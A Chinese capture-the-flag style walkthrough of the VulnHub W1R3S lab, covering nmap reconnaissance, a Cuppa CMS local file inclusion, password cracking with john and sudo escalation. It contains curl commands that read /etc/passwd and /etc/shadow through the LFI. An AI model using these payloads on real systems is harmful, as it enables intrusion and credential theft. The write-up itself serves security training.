标签：tcp .. 192.168 W1R3S 漏洞 VulnHub 靶场 open 137.133

 

时间：2021.2.17

靶场信息：
地址：https://www.vulnhub.com/entry/w1r3s-101,220/
发布日期：2018年2月5日 
目标：得到root权限&找到flag

一、信息收集

1、获取靶机IP地址

nmap -sP 192.168.137.0/24

由探测的结果可知，靶机的IP为192.168.137.133

2、扫描开放的端口和服务

nmap -sS -sV -T5 -A -p- 192.168.137.133

得到开放的端口信息：

21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)

3、网站信息收集

没什么有用的信息，先用dirb爆破一下目录

找到了几个重要的目录，/administrator、/installation 和 /wordpress /，先访问http://192.168.137.133/administrator/installation/，发现这个是Cuppa CMS的安装设置

二、漏洞探测

那么我们就百度搜索一下这个cms是否存在可以利用的漏洞

这个点进去看看，发现该CMS存在一个本地文件包含的漏洞

具体参考：

[Cuppa]  https://www.exploit-db.com/exploits/25971 

三、漏洞利用

根据上面的方法，发现读取不到

那就使用curl来利用LFI漏洞获取/etc/password文件

curl -s --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.137.133/administrator/alerts/alertConfigField.php

[Curl详解]  https://www.ruanyifeng.com/blog/2019/09/curl-reference.html 

找到了一个用户w1r3s，然后同样的方法读取/etc/shadow

curl -s --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.137.133/administrator/alerts/alertConfigField.php

找到了用户w1r3s的salt密码，我们用john破解此密码

用户名：w1r3s
密码：computer

之前扫描到开放了22号端口，我们ssh登录

四、提权

发现可以sudo提权，然后查看flag

总结

了解了Cuppa CMS的本地文件包含漏洞的原理以及如何利用

 

标签：tcp,..,192.168,W1R3S,漏洞,VulnHub,靶场,open,137.133
来源： https://www.cnblogs.com/darklee/p/14408475.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。